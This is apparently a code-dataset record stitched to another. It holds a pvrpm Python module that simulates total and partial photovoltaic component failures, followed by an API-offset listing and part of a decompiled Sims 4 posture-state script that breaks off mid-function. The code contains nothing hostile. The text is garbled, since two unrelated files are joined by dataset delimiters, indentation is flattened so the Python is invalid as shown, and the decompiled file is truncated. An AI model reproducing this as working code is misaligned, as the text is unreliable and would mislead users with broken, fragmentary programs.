(7116, 7148), True, 'import numpy as np\n')] |
from abc import ABC, abstractmethod
import numpy as np
import pandas as pd
from pvrpm.core.enums import ConfigKeys as ck
from pvrpm.core.case import SamCase
from pvrpm.core.utils import sample, get_higher_components
from pvrpm.core.modules.monitor import IndepMonitor
class Failure(ABC):
"""
This abstract class defines how a failure should be set up
"""
def __init__(
self,
level: str,
comp_level_df: pd.DataFrame,
case: SamCase,
indep_monitoring: IndepMonitor = None,
):
"""
        Initializes a failure instance
        Args:
            level (str): The component level this failure is a part of
            comp_level_df (:obj:`pd.DataFrame`): The component level dataframe containing the simulation data
            case (:obj:`SamCase`): The SAM case for this simulation
            indep_monitoring (:obj:`IndepMonitor`, Optional): For updating static monitoring during simulation
"""
super().__init__()
self.level = level
self.df = comp_level_df
self.case = case
self.fails_per_day = {}
self.indep_monitoring = indep_monitoring
self.last_failure_day = 0
self.mean = None
self.initialize_components()
@abstractmethod
def initialize_components(self):
"""
        Initializes failure data for all components to be tracked during simulation for this failure type
Note:
Updates the underlying dataframes in place
"""
pass
@abstractmethod
def reinitialize_components(self, df: pd.DataFrame) -> pd.DataFrame:
"""
        Reinitialize components in a dataframe similar to the initial initialization. Used when repairs or other events occur
Args:
df (:obj:`pd.DataFrame`): The dataframe containing the components to reinitalize
Returns:
:obj:`pd.DataFrame`: The reinitalized components
"""
pass
@abstractmethod
def update(self, day: int):
"""
Perform a failure update for one day in the simulation:
Changes state of a component to failed, incrementing failures and checking warranty only for failed components of each failure type
Args:
day (int): Current day in the simulation
Note:
Updates the underlying dataframes in place
"""
pass
class TotalFailure(Failure):
"""
Describes how a total failure of a component should operate
"""
def initialize_components(self):
component_info = self.case.config[self.level]
df = self.df
failure_modes = list(component_info.get(ck.FAILURE, {}).keys())
self.mean = {} # init mean for each failure mode
possible_failure_times = np.zeros((component_info[ck.NUM_COMPONENT], len(failure_modes)))
for i, mode in enumerate(failure_modes):
self.mean[mode] = 0
            # initialize failure mode by type
df[f"failure_by_type_{mode}"] = 0
fail = component_info[ck.FAILURE][mode]
if fail.get(ck.FRAC, None) or fail.get(ck.DECAY_FRAC, None):
frac = fail[ck.FRAC] if ck.FRAC in fail else fail[ck.DECAY_FRAC]
# choose a percentage of components to be defective
sample_ = np.random.random_sample(size=component_info[ck.NUM_COMPONENT])
defective = sample_ < frac
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
possible_failure_times[:, i] = np.where(list(defective), sample_, np.finfo(np.float32).max)
else:
# setup failure times for each component
possible_failure_times[:, i] = sample(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])
            # initialize failures per day for this failure mode
self.fails_per_day[mode] = np.zeros(self.case.config[ck.LIFETIME_YRS] * 365)
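        # across the sampled failure-mode columns, argmin records which mode is expected
        # to fire first for each component and amin keeps that earliest time to failure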
failure_ind = np.argmin(possible_failure_times, axis=1)
df["time_to_failure"] = np.amin(possible_failure_times, axis=1)
df["failure_type"] = [failure_modes[i] for i in failure_ind]
def reinitialize_components(self, df: pd.DataFrame) -> pd.DataFrame:
component_info = self.case.config[self.level]
failure_modes = list(component_info.get(ck.FAILURE, {}).keys())
fraction_failures = []
num_repaired = len(df)
possible_failure_times = np.zeros((num_repaired, len(failure_modes)))
for i, mode in enumerate(failure_modes):
fail = component_info[ck.FAILURE][mode]
if fail.get(ck.FRAC, None) or fail.get(ck.DECAY_FRAC, None):
frac = 0
if fail.get(ck.FRAC, None):
fraction_failures.append(mode)
frac = fail[ck.FRAC]
else:
frac = fail[ck.DECAY_FRAC]
# choose a percentage of modules to be defective
sample_ = np.random.random_sample(size=num_repaired)
defective = sample_ < frac
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], num_repaired)
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
possible_failure_times[:, i] = np.where(
list(defective),
sample_,
np.finfo(np.float32).max,
)
else:
# setup failure times for each component
possible_failure_times[:, i] = sample(fail[ck.DIST], fail[ck.PARAM], num_repaired)
failure_ind = np.argmin(possible_failure_times, axis=1)
df["time_to_failure"] = np.amin(possible_failure_times, axis=1)
df["failure_type"] = [failure_modes[i] for i in failure_ind]
# now, need to make sure that our fractional failures percentages are met for all components in this level
# TODO: need to speed this up somehow
if fraction_failures:
# removes the diminishing effect where at the beginning of the simulation frac modules are a defective failure, then frac of frac is defective, etc.
            # possible failure times will also include whatever the current failure time is for the component, if it's less than a defective one it doesn't change
possible_failure_times = np.zeros((len(self.df), len(fraction_failures) + 1))
possible_failure_times.fill(np.finfo(np.float32).max)
# NOTE: i think i should just instead of doing the whole df, find the fraction, then sample that fraction from the components and just update those using the same method below
for i, mode in enumerate(fraction_failures):
counts = (self.df["failure_type"].astype(str) == mode).sum()
frac = counts / len(self.df)
fail = component_info[ck.FAILURE][mode]
if frac >= fail[ck.FRAC]:
continue
sample_ = np.random.random_sample(size=len(self.df))
# we just want the difference in fractions to bump it up to the failure fraction
defective = sample_ < (fail[ck.FRAC] - frac)
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], len(self.df))
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
possible_failure_times[:, i] = np.where(
list(defective),
sample_,
np.finfo(np.float32).max,
)
possible_failure_times[:, -1] = self.df["time_to_failure"]
failure_ind = np.argmin(possible_failure_times, axis=1)
types = []
for comp, i in enumerate(failure_ind):
if i != len(fraction_failures):
types.append(fraction_failures[i])
else:
types.append(self.df["failure_type"].iloc[comp])
self.df["time_to_failure"] = np.amin(possible_failure_times, axis=1)
self.df["failure_type"] = np.array(types).astype(str)
return df
def update(self, day: int):
df = self.df
# decrement time to failures for operational modules
# TODO: change this to state > 0 once partial failures implemented
df["time_to_failure"] -= 1
failure_modes = list(self.case.config[self.level][ck.FAILURE].keys())
# TODO: change this to state > 0 once partial failures implemented
mask = (df["state"] == 1) & (df["time_to_failure"] < 1)
failed_comps = df.loc[mask].copy()
if len(failed_comps) > 0:
self.last_failure_day = day
failed_comps["time_to_failure"] = 0
failed_comps["cumulative_failures"] += 1
for fail in failure_modes:
fail_mask = failed_comps["failure_type"].astype(str) == fail
failed_comps.loc[fail_mask, f"failure_by_type_{fail}"] += 1
self.fails_per_day[fail][day] += len(failed_comps.loc[fail_mask])
warranty_mask = failed_comps["time_left_on_warranty"] <= 0
failed_comps.loc[warranty_mask, "cumulative_oow_failures"] += 1
failed_comps["state"] = 0
# update time to detection times for component levels with only independent monitoring
# which will have None for monitor times
try:
if failed_comps["monitor_times"].isnull().any():
# monitor and time to detection will be the time to next indep monitoring
indep_monitors = list(self.case.config[self.level][ck.INDEP_MONITOR].keys())
# next indep monitoring is the min of the possible indep monitors for this component level
failed_comps["monitor_times"] = np.amin(self.indep_monitoring.indep_monitoring[indep_monitors])
# in order to calculate the time to detection for component levels only monitoring by an
# independment monitoring with a threshold (no interval), need to instead
# set the nans that will be there to the day in the simulation when these components failed
# so it can be calculated later
failed_comps["monitor_times"] = failed_comps["monitor_times"].fillna(day)
failed_comps["time_to_detection"] = None # failed_comps["monitor_times"].copy()
            # fails if no monitoring defined, faster than just doing a check if the column exists or whatever
except KeyError:
pass
df.loc[mask] = failed_comps
else:
# check to see when last failure was for fraction failure, and update components with new failures
            # if it's been longer than the mean time of the distribution
            # this is so if repairs aren't occurring due to poor monitoring, failures are still occurring
failure_modes = list(self.case.config[self.level].get(ck.FAILURE, {}).keys())
fraction_failures = []
for mode in failure_modes:
fail = self.case.config[self.level][ck.FAILURE][mode]
if fail.get(ck.FRAC, None):
# extract mean, since some distributions might not have mean defined in params
if self.mean[mode] == 0:
self.mean[mode] = sample(fail[ck.DIST], fail[ck.PARAM], 10000).mean()
if day > (self.mean[mode] + self.last_failure_day):
fraction_failures.append(mode)
self.last_failure_day = day
for mode in fraction_failures:
# fail new fraction of components
# possible failure times will also include whatever the current failure time is for the component, if its less then a defective one it doesn't change
possible_failure_times = np.zeros((len(self.df), len(fraction_failures) + 1))
possible_failure_times.fill(np.finfo(np.float32).max)
# NOTE: i think i should just instead of doing the whole df, find the fraction, then sample that fraction from the components and just update those using the same method below
for i, mode in enumerate(fraction_failures):
fail = self.case.config[self.level][ck.FAILURE][mode]
sample_ = np.random.random_sample(size=len(self.df))
defective = sample_ < fail[ck.FRAC]
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], len(self.df))
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
possible_failure_times[:, i] = np.where(
list(defective),
sample_,
np.finfo(np.float32).max,
)
possible_failure_times[:, -1] = self.df["time_to_failure"]
failure_ind = np.argmin(possible_failure_times, axis=1)
types = []
for comp, i in enumerate(failure_ind):
if i != len(fraction_failures):
types.append(fraction_failures[i])
else:
types.append(self.df["failure_type"].iloc[comp])
self.df["time_to_failure"] = np.amin(possible_failure_times, axis=1)
self.df["failure_type"] = np.array(types).astype(str)
class PartialFailure(Failure):
"""
Specifies a decrease in the state of a component via a failure
    Unlike total failures, every defined partial failure will have its own object, instead of managing all of them at once
"""
def __init__(
self,
level: str,
comp_level_df: pd.DataFrame,
case: SamCase,
mode: str,
indep_monitoring: IndepMonitor = None,
):
"""
        Initializes a partial failure instance
        Args:
            level (str): The component level this failure is a part of
            comp_level_df (:obj:`pd.DataFrame`): The component level dataframe containing the simulation data
            case (:obj:`SamCase`): The SAM case for this simulation
            mode (str): The name of the partial failure mode
            indep_monitoring (:obj:`IndepMonitor`, Optional): For updating static monitoring during simulation
"""
self.mode = mode
super().__init__(level, comp_level_df, case, indep_monitoring=indep_monitoring)
def initialize_components(self):
component_info = self.case.config[self.level]
df = self.df
mode = self.mode
failure_times = None
        # initialize failure mode by type
df[f"failure_by_type_{mode}"] = 0
fail = component_info[ck.PARTIAL_FAIL][mode]
if fail.get(ck.FRAC, None) or fail.get(ck.DECAY_FRAC, None):
frac = fail[ck.FRAC] if ck.FRAC in fail else fail[ck.DECAY_FRAC]
# choose a percentage of components to be defective
sample_ = np.random.random_sample(size=component_info[ck.NUM_COMPONENT])
defective = sample_ < frac
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
failure_times = np.where(list(defective), sample_, np.nan)
else:
# setup failure times for each component
failure_times = sample(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])
        # initialize failures per day for this failure mode
self.fails_per_day = {self.mode: np.zeros(self.case.config[ck.LIFETIME_YRS] * 365)}
df[f"time_to_failure_{mode}"] = failure_times
def reinitialize_components(self, df: pd.DataFrame) -> pd.DataFrame:
component_info = self.case.config[self.level]
num_repaired = len(df)
fraction_failure = False
failure_times = None
mode = self.mode
fail = component_info[ck.PARTIAL_FAIL][mode]
if fail.get(ck.FRAC, None) or fail.get(ck.DECAY_FRAC, None):
if fail.get(ck.FRAC, None):
fraction_failure = True
frac = fail[ck.FRAC]
else:
frac = fail[ck.DECAY_FRAC]
# choose a percentage of modules to be defective
sample_ = np.random.random_sample(size=num_repaired)
defective = sample_ < frac
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], num_repaired)
# only give a possible failure time if the module is defective, otherwise it is set to nan, partial failure is not applied
failure_times = np.where(list(defective), sample_, np.nan)
else:
# setup failure times for each component
failure_times = sample(fail[ck.DIST], fail[ck.PARAM], num_repaired)
df[f"time_to_failure_{mode}"] = failure_times
# now, need to make sure that our fractional failure percentage is met for all components in this level
# TODO: need to speed this up somehow
if fraction_failure:
# removes the diminishing effect where at the beginning of the simulation frac modules are a defective failure, then frac of frac is defective, etc.
# NOTE: i think i should just instead of doing the whole df, find the fraction, then sample that fraction from the components and just update those using the same method below
            # the number currently in this failure mode is the count of non-nan time_to_failure values
counts = self.df[f"time_to_failure_{mode}"].isna()
update_df = self.df.loc[counts].copy()
frac = (~counts).sum() / len(self.df)
if frac >= fail[ck.FRAC]:
return df
sample_ = np.random.random_sample(size=len(update_df))
# we just want the difference in fractions to bump it up to the failure fraction
defective = sample_ < (fail[ck.FRAC] - frac)
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], len(update_df))
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
failure_times = np.where(
list(defective),
sample_,
np.nan,
)
update_df[f"time_to_failure_{mode}"] = failure_times
self.df.loc[counts] = update_df
return df
def update(self, day: int):
df = self.df
# decrement time to failures
df[f"time_to_failure_{self.mode}"] -= 1
mask = (df["state"] == 1) & (df[f"time_to_failure_{self.mode}"] < 1)
failed_comps = df.loc[mask].copy()
if len(failed_comps) > 0:
self.last_failure_day = day
failed_comps["cumulative_failures"] += 1
failed_comps[f"failure_by_type_{self.mode}"] += 1
self.fails_per_day[self.mode][day] += len(failed_comps)
warranty_mask = failed_comps["time_left_on_warranty"] <= 0
failed_comps.loc[warranty_mask, "cumulative_oow_failures"] += 1
failed_comps["state"] = 0
# update time to detection times for component levels with only static monitoring
# which will have None for monitor times
try:
if failed_comps["monitor_times"].isnull().any():
# monitor and time to detection will be the time to next static monitoring
indep_monitors = list(self.case.config[self.level][ck.INDEP_MONITOR].keys())
# next static monitoring is the min of the possible static monitors for this component level
failed_comps["monitor_times"] = np.amin(self.indep_monitoring.indep_monitoring[indep_monitors])
# in order to calculate the time to detection for component levels only monitoring by an
# independment monitoring with a threshold (no interval), need to instead
# set the nans that will be there to the day in the simulation when these components failed
# so it can be calculated later
failed_comps["monitor_times"] = failed_comps["monitor_times"].fillna(day)
failed_comps["time_to_detection"] = None # failed_comps["monitor_times"].copy()
            # fails if no monitoring defined, faster than just doing a check if the column exists or whatever
except KeyError:
pass
df.loc[mask] = failed_comps
else:
# check to see when last failure was for fraction failure, and update components with new failures
            # if it's been longer than the mean time of the distribution
            # this is so if repairs aren't occurring due to poor monitoring, failures are still occurring
fail = self.case.config[self.level][ck.PARTIAL_FAIL][self.mode]
if fail.get(ck.FRAC, None):
# extract mean, since some distributions might not have mean defined in params
if not self.mean:
self.mean = sample(fail[ck.DIST], fail[ck.PARAM], 10000).mean()
if day > (self.mean + self.last_failure_day):
# fail new fraction of components
counts = self.df[f"time_to_failure_{self.mode}"].isna()
update_df = self.df.loc[counts].copy()
sample_ = np.random.random_sample(size=len(update_df))
# we just want the difference in fractions to bump it up to the failure fraction
defective = sample_ < fail[ck.FRAC]
sample_ = sample(fail[ck.DIST], fail[ck.PARAM], len(update_df))
# only give a possible failure time if the module is defective, otherwise it is set to numpy max float value (which won't be used)
failure_times = np.where(
list(defective),
sample_,
np.nan,
)
update_df[f"time_to_failure_{self.mode}"] = failure_times
self.df.loc[counts] = update_df
self.last_failure_day = day
| [
"numpy.random.random_sample",
"numpy.amin",
"pvrpm.core.utils.sample",
"numpy.array",
"numpy.zeros",
"numpy.finfo",
"numpy.argmin"
] | [((4175, 4216), 'numpy.argmin', 'np.argmin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (4184, 4216), True, 'import numpy as np\n'), ((4249, 4288), 'numpy.amin', 'np.amin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (4256, 4288), True, 'import numpy as np\n'), ((5894, 5935), 'numpy.argmin', 'np.argmin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (5903, 5935), True, 'import numpy as np\n'), ((5968, 6007), 'numpy.amin', 'np.amin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (5975, 6007), True, 'import numpy as np\n'), ((4102, 4151), 'numpy.zeros', 'np.zeros', (['(self.case.config[ck.LIFETIME_YRS] * 365)'], {}), '(self.case.config[ck.LIFETIME_YRS] * 365)\n', (4110, 4151), True, 'import numpy as np\n'), ((7981, 8022), 'numpy.argmin', 'np.argmin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (7990, 8022), True, 'import numpy as np\n'), ((8333, 8372), 'numpy.amin', 'np.amin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (8340, 8372), True, 'import numpy as np\n'), ((15496, 15558), 'numpy.random.random_sample', 'np.random.random_sample', ([], {'size': 'component_info[ck.NUM_COMPONENT]'}), '(size=component_info[ck.NUM_COMPONENT])\n', (15519, 15558), True, 'import numpy as np\n'), ((15621, 15692), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'component_info[ck.NUM_COMPONENT]'], {}), '(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])\n', (15627, 15692), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((16004, 16075), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'component_info[ck.NUM_COMPONENT]'], {}), '(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])\n', (16010, 16075), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((16177, 16226), 'numpy.zeros', 'np.zeros', (['(self.case.config[ck.LIFETIME_YRS] * 365)'], {}), '(self.case.config[ck.LIFETIME_YRS] * 365)\n', (16185, 16226), True, 'import numpy as np\n'), ((16914, 16956), 'numpy.random.random_sample', 'np.random.random_sample', ([], {'size': 'num_repaired'}), '(size=num_repaired)\n', (16937, 16956), True, 'import numpy as np\n'), ((17019, 17070), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'num_repaired'], {}), '(fail[ck.DIST], fail[ck.PARAM], num_repaired)\n', (17025, 17070), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((17373, 17424), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'num_repaired'], {}), '(fail[ck.DIST], fail[ck.PARAM], num_repaired)\n', (17379, 17424), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((3343, 3405), 'numpy.random.random_sample', 'np.random.random_sample', ([], {'size': 'component_info[ck.NUM_COMPONENT]'}), '(size=component_info[ck.NUM_COMPONENT])\n', (3366, 3405), True, 'import numpy as np\n'), ((3476, 3547), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'component_info[ck.NUM_COMPONENT]'], {}), '(fail[ck.DIST], fail[ck.PARAM], component_info[ck.NUM_COMPONENT])\n', (3482, 3547), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((3927, 3998), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'component_info[ck.NUM_COMPONENT]'], {}), '(fail[ck.DIST], 
fail[ck.PARAM], component_info[ck.NUM_COMPONENT])\n', (3933, 3998), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((5196, 5238), 'numpy.random.random_sample', 'np.random.random_sample', ([], {'size': 'num_repaired'}), '(size=num_repaired)\n', (5219, 5238), True, 'import numpy as np\n'), ((5309, 5360), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'num_repaired'], {}), '(fail[ck.DIST], fail[ck.PARAM], num_repaired)\n', (5315, 5360), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((5819, 5870), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', 'num_repaired'], {}), '(fail[ck.DIST], fail[ck.PARAM], num_repaired)\n', (5825, 5870), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((13424, 13465), 'numpy.argmin', 'np.argmin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (13433, 13465), True, 'import numpy as np\n'), ((13804, 13843), 'numpy.amin', 'np.amin', (['possible_failure_times'], {'axis': '(1)'}), '(possible_failure_times, axis=1)\n', (13811, 13843), True, 'import numpy as np\n'), ((6722, 6742), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (6730, 6742), True, 'import numpy as np\n'), ((8411, 8426), 'numpy.array', 'np.array', (['types'], {}), '(types)\n', (8419, 8426), True, 'import numpy as np\n'), ((10172, 10235), 'numpy.amin', 'np.amin', (['self.indep_monitoring.indep_monitoring[indep_monitors]'], {}), '(self.indep_monitoring.indep_monitoring[indep_monitors])\n', (10179, 10235), True, 'import numpy as np\n'), ((20340, 20403), 'numpy.amin', 'np.amin', (['self.indep_monitoring.indep_monitoring[indep_monitors]'], {}), '(self.indep_monitoring.indep_monitoring[indep_monitors])\n', (20347, 20403), True, 'import numpy as np\n'), ((3778, 3798), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (3786, 3798), True, 'import numpy as np\n'), ((5652, 5672), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (5660, 5672), True, 'import numpy as np\n'), ((7839, 7859), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (7847, 7859), True, 'import numpy as np\n'), ((12393, 12413), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (12401, 12413), True, 'import numpy as np\n'), ((13886, 13901), 'numpy.array', 'np.array', (['types'], {}), '(types)\n', (13894, 13901), True, 'import numpy as np\n'), ((13270, 13290), 'numpy.finfo', 'np.finfo', (['np.float32'], {}), '(np.float32)\n', (13278, 13290), True, 'import numpy as np\n'), ((21744, 21788), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', '(10000)'], {}), '(fail[ck.DIST], fail[ck.PARAM], 10000)\n', (21750, 21788), False, 'from pvrpm.core.utils import sample, get_higher_components\n'), ((11763, 11807), 'pvrpm.core.utils.sample', 'sample', (['fail[ck.DIST]', 'fail[ck.PARAM]', '(10000)'], {}), '(fail[ck.DIST], fail[ck.PARAM], 10000)\n', (11769, 11807), False, 'from pvrpm.core.utils import sample, get_higher_components\n')] |
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\postures\posture_state_spec.py
# Compiled at: 2020-04-15 01:17:36
# Size of source mod 2**32: 27750 bytes
from collections import namedtuple
from timeit import itertools
import functools
from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR
from objects.components.types import CARRYABLE_COMPONENT
from objects.definition import Definition
from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match
from sims4.collections import frozendict
import services
ANIMATION_PARTICIPANT_TO_POSTURE_SPEC_VARIABLE_MAP = {AnimationParticipant.CONTAINER: PostureSpecVariable.INTERACTION_TARGET,
AnimationParticipant.TARGET: PostureSpecVariable.INTERACTION_TARGET}
POSTURE_SPEC_MANIFEST_INDEX = 0
POSTURE_SPEC_SLOT_MANIFEST_INDEX = 1
POSTURE_SPEC_BODY_TARGET_INDEX = 2
_PostureStateSpec = namedtuple('_PostureStateSpec', ('posture_manifest', 'slot_manifest',
'body_target'))
class PostureStateSpec(_PostureStateSpec):
__slots__ = ()
def __new__(cls, posture_manifest, slot_manifest, body_target):
posture_manifest = posture_manifest.get_constraint_version().frozen_copy()
return _PostureStateSpec.__new__(cls, posture_manifest, slot_manifest.frozen_copy(), body_target)
def __str__(self):
items = ', '.join((str(i) for i in self))
return '[' + items + ']'
def get_concrete_version(self, target_resolver, posture_state=None):
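        # Resolves placeholder actors (interaction target, surface, carry target) to concrete
        # objects via target_resolver and returns the resulting concrete PostureStateSpec.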
posture_manifest = self.posture_manifest.apply_actor_map(target_resolver)
slot_manifest = self.slot_manifest.apply_actor_map(target_resolver)
        if posture_state is not None and (self.body_target is PostureSpecVariable.ANYTHING or self.body_target is PostureSpecVariable.BODY_TARGET_FILTERED) and posture_state.body.target is not None:
            body_target = posture_state.body.target
        else:
            body_target = target_resolver(self.body_target, self.body_target)
if posture_manifest:
posture_types = []
for posture_manifest_entry in posture_manifest:
if posture_manifest_entry.posture_type_specific:
is_specific = True
posture_type = posture_manifest_entry.posture_type_specific
posture_types.append((posture_type, is_specific))
else:
if posture_manifest_entry.posture_type_family:
is_specific = False
posture_type = posture_manifest_entry.posture_type_family
posture_types.append((posture_type, is_specific))
surface_target = posture_manifest_entry.surface_target
allow_surface = posture_manifest_entry.allow_surface
if allow_surface:
if slot_manifest:
for slot_manifest_entry in slot_manifest:
if isinstance(slot_manifest_entry.actor, str):
continue
slotted_object = slot_manifest_entry.actor
break
else:
slotted_object = None
if slotted_object is not None and slotted_object.definition is not slotted_object and slotted_object.carryable_component is None:
surface_target = None
slotted_object_or_parent = slotted_object
while slotted_object_or_parent is not None:
if slotted_object_or_parent.is_surface(include_parts=True, ignore_deco_slots=True):
surface_target = slotted_object_or_parent
break
slotted_object_or_parent = slotted_object_or_parent.parent
if surface_target is not None:
def get_surface(participant, default):
if participant in (AnimationParticipant.SURFACE, PostureSpecVariable.SURFACE_TARGET):
return surface_target
return default
posture_manifest = posture_manifest.apply_actor_map(get_surface)
slot_manifest = slot_manifest.apply_actor_map(get_surface)
if slot_manifest and surface_target is not None:
if not isinstance(surface_target, (AnimationParticipant, PostureSpecVariable, str)):
slot_manifest = slot_manifest.apply_actor_map({PostureSpecVariable.ANYTHING: surface_target}.get)
if body_target == PostureSpecVariable.ANYTHING and posture_types:
if surface_target is not None:
if not isinstance(surface_target, (AnimationParticipant, PostureSpecVariable, str)):
if all((posture_type.mobile for posture_type, _ in posture_types)):
body_target = surface_target
else:
for child in surface_target.children:
if child.parent is not surface_target:
continue
if all((child.supports_posture_type(posture_type, is_specific=is_specific) for posture_type, is_specific in posture_types)):
body_target = child
break
else:
if all((surface_target.supports_posture_type(posture_type, is_specific=is_specific) for posture_type, is_specific in posture_types)):
body_target = surface_target
else:
                    if not isinstance(body_target, (AnimationParticipant, PostureSpecVariable, str)) and (surface_target is None or isinstance(surface_target, (AnimationParticipant, PostureSpecVariable, str))):
surface_target = None
body_target_or_parent = body_target
while body_target_or_parent is not None:
if body_target_or_parent.is_surface(include_parts=True, ignore_deco_slots=True):
surface_target = body_target_or_parent
break
body_target_or_parent = body_target_or_parent.parent
if surface_target is not None:
def get_surface(participant, default):
if participant in (AnimationParticipant.SURFACE, PostureSpecVariable.SURFACE_TARGET):
return surface_target
return default
posture_manifest = posture_manifest.apply_actor_map(get_surface)
slot_manifest = slot_manifest.apply_actor_map(get_surface)
return PostureStateSpec(posture_manifest, slot_manifest, body_target)
def get_holster_version(self):
return PostureStateSpec(self.posture_manifest.get_holster_version(), self.slot_manifest, self.body_target)
def get_posture_specs_gen(self, interaction=None):
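        # Yields (PostureSpec, var_map) pairs for every posture manifest entry, expanding
        # carry-hand, surface and slot requirements into PostureSpecVariable bindings.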
for posture_manifest_entry in self.posture_manifest:
var_map = {}
hand, carry_target = posture_manifest_entry.carry_hand_and_target
if hand is not None:
allowed_hands = None
if posture_manifest_entry.actor in _NOT_SPECIFIC_ACTOR:
carry_actor = interaction.sim if interaction is not None else None
else:
carry_actor = posture_manifest_entry.actor
if isinstance(carry_target, (str, Definition)) or carry_target == AnimationParticipant.CREATE_TARGET:
carry = PostureAspectCarry((PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, None, PostureSpecVariable.HAND))
if isinstance(carry_target, Definition):
allowed_hands = carry_target.get_allowed_hands(carry_actor)
else:
carry = PostureAspectCarry((PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT, PostureSpecVariable.CARRY_TARGET, PostureSpecVariable.HAND))
if hasattr(carry_target, 'manager'):
allowed_hands = carry_target.get_allowed_hands(carry_actor)
var_map[PostureSpecVariable.CARRY_TARGET] = carry_target
                if allowed_hands is not None and hand not in allowed_hands:
continue
var_map[PostureSpecVariable.HAND] = hand
else:
carry = None
surface_target = posture_manifest_entry.surface_target
if surface_target is not None:
if isinstance(surface_target, (str, AnimationParticipant)):
surface_target = ANIMATION_PARTICIPANT_TO_POSTURE_SPEC_VARIABLE_MAP.get(surface_target, PostureSpecVariable.SURFACE_TARGET)
elif posture_manifest_entry.allow_surface:
surface_target = PostureSpecVariable.ANYTHING
else:
surface_target = None
carryable_surfaces = []
other_surfaces = []
for slot_manifest_entry in self.slot_manifest:
slot_var_map = {}
slot_var_map[PostureSpecVariable.SLOT] = slot_manifest_entry
slot_type = PostureSpecVariable.SLOT
slot_child = slot_manifest_entry.actor
slot_parent = slot_manifest_entry.target
slot_child_is_carryable = False
slot_target = None
if isinstance(slot_child, str):
slot_target = None
else:
if isinstance(slot_child, Definition) or slot_child == AnimationParticipant.CREATE_TARGET:
slot_target = None
slot_var_map[PostureSpecVariable.SLOT_TEST_DEFINITION] = slot_child
if hasattr(slot_child, 'manager'):
included_sis = []
if interaction is not None:
if interaction.transition is not None:
included_sis = interaction.transition.get_included_sis().union((interaction,))
else:
                                included_sis = (interaction,)
slot_child_is_carryable = True if slot_child.has_component(CARRYABLE_COMPONENT) else False
if slot_child_is_carryable:
if any((included_si.carry_target is slot_child for included_si in included_sis)):
slot_var_map[PostureSpecVariable.CARRY_TARGET] = slot_child
slot_target = ANIMATION_PARTICIPANT_TO_POSTURE_SPEC_VARIABLE_MAP.get(slot_child, PostureSpecVariable.CARRY_TARGET)
else:
if any((included_si.target is slot_child for included_si in included_sis)):
slot_var_map[PostureSpecVariable.SLOT_TARGET] = slot_child
slot_target = ANIMATION_PARTICIPANT_TO_POSTURE_SPEC_VARIABLE_MAP.get(slot_child, PostureSpecVariable.SLOT_TARGET)
else:
